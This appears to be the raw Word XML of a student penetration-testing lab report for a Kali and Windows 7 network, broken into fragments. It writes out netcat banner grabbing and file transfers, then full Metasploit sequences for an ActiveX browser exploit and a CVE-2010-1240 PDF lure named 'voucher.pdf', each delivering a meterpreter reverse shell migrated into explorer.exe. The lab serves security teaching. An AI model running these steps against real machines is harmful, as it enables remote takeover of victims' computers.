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1.1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nc 192.168.1.103 21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software program is vsFTPd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version is  2.3.4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-3437" l="0" r="0" t="34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1.2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nc 192.168.1.103 3306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5.0.51a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11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1.3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cd Downloads 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nc -vlp 2222 &gt; genius.txt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ls - l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cd Documents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nc 192.168.1.102 2222 &lt; genius.txt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3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1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1.4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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nc 192.168.1.101 2222 &gt; happy.txt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ls - l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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B. 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nc -vlp 2222 &lt; happy.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021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C.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023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51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2.1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All steps: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 sudo service postgresql start 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sudo msfconsole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search activex scripting browser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0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payload windows/x64/meterpreter/reverse_tcp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show options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srvport 80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uripath prize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allowprompt true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show advanced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prependMigrate true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prependMigrateProc explorer.exe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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">//(Use the created link in the target browser)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session -i 1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migrate 2580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ps -S explorer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getuid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getpid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0">
      <w:pPr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13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b w:val="1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2.2</w:t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00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Local Address:Port</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Kali side)</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Peer Address:Port (Win7 side)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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192.168.1.102:4444</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">192.168.1.101:49171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3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3.1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All steps:</w:t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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">//</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">create the pdf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 sudo service postgresql start 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sudo msfconsole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search cve:2010-1240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use 1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set payload windows/x64/meterpreter/reverse_tcp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show options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set exename iexplorer.exe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set filename voucher.pdf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back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>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">//set handler to receive tcp connection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exploit/multi/handler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set payload windows/x64/meterpreter/reverse_tcp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set lhost 192.168.1.102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lport 4444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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">//use nc to transfer “voucher.pdf” from kali to win 7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cd /root/.msf4/local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nc -vlp 2222 &lt; voucher.pdf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cd Documents (on win 7)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nc 192.168.1.102 2222 &gt; voucher.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">//opening the pdf file, which will establish the connection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pwd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getpid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ps -S explorer</w:t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migrate 2580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pwd</w:t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getpid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ps -S explorer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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 accidently used ‘iexplorer.exe’ for the new process, but I believe this won’t matter, in this scenario, as it then needs to be migrated to the exciting/true ‘explorer.exe’ process; which will produce the same result.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078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26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7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3.2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command is ‘screenshot’ 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197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3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